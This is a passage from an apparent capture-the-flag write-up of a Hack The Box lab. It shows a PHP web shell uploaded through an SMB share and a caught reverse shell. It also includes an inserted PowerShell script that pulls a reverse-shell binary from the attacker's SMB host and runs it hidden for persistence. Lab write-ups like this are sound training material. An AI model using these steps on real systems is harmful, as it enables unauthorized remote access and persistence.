Arbitrary File Upload


It was confirmed that the //secnotes.htb/new-site SMB share mirrors the web root of the web server listening on port 8808 of the target, so anything written to the share is served by that site

smb: \> put shell.php 
putting file shell.php as \shell.php (102.0 kb/s) (average 22.0 kb/s)

Delivering the payload to the web server on target port 8808 via the SMB share

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl http://secnotes.htb:8808/shell.php

Triggering the payload by requesting the uploaded file over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 58579
socket: Shell has connected! PID: 3340
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\inetpub\new-site> whoami
iis apppool\newsite
 
c:\inetpub\new-site> hostname
SECNOTES
 
c:\inetpub\new-site> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

Initial foothold established on the target system as iis apppool\newsite via arbitrary file upload

Stabilizer


But I keep getting cut off: the shell belongs to a process spawned from a file that is periodically deleted. So I need to find a way to establish a more stable shell environment

C:\inetpub\new-site> mkdir \tmp
C:\inetpub\new-site> cd \tmp
C:\tmp> copy \\10.10.14.10\smb\64ps9998.exe .
C:\tmp> 64ps9998.exe

I transferred a reverse shell executable to the \tmp directory I created and executed it

I would have preferred to place the binary in the web root of the other web server (C:\inetpub\wwwroot) so I could reach it easily when needed, but this identity has no write permission on that directory
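The stabilization step above, written out as a PowerShell snippet to run inside the foothold shell. This is an added example, not part of the original writeup: it first probes which of the candidate directories the iis apppool\newsite identity can actually write to (the writeup reports C:\inetpub\wwwroot is not writable), then pulls the standalone reverse shell over SMB into the staging directory and launches it as a detached process rather than as a child of the PHP worker that served shell.php. The attacker host 10.10.14.10, the binary name 64ps9998.exe and the staging directory C:\tmp are taken from the writeup; the share name `smb` on the attacker host is assumed.

```powershell
# Added example (not from the original writeup). Run from the web shell as
# iis apppool\newsite. Assumes an SMB share named 'smb' on the attacker host
# that serves the reverse shell binary.
$attacker = '10.10.14.10'
$binary   = '64ps9998.exe'
$stage    = 'C:\tmp'

# Try to create and delete a random file; this is the only reliable way to
# learn whether the current token can write to a directory, since icacls
# output is hard to interpret for app pool identities.
function Test-Writable([string]$dir) {
    $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -Path $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Staging directory outside the mirrored new-site folder, so the periodic
# cleanup of that folder does not remove the binary.
New-Item -ItemType Directory -Path $stage -Force | Out-Null

foreach ($d in 'C:\inetpub\wwwroot', 'C:\inetpub\new-site', $stage) {
    '{0,-25} writable={1}' -f $d, (Test-Writable $d)
}

# Fetch the binary over SMB and start it as its own process with no console
# window, so it is not tied to the lifetime of the shell.php request.
Copy-Item -Path "\\$attacker\smb\$binary" -Destination $stage
Start-Process -FilePath (Join-Path $stage $binary) `
              -WorkingDirectory $stage `
              -WindowStyle Hidden
```

Start the listener on the attacker side (port 9998 in the writeup) before running this; the writable-directory table printed first tells you where a second copy can be staged if the first one is ever cleaned up.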

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 59038
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\tmp> whoami
iis apppool\newsite
PS C:\tmp> hostname
SECNOTES
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

It’s all good: this shell runs from C:\tmp and does not depend on the uploaded shell.php, so it survives the periodic cleanup of the new-site directory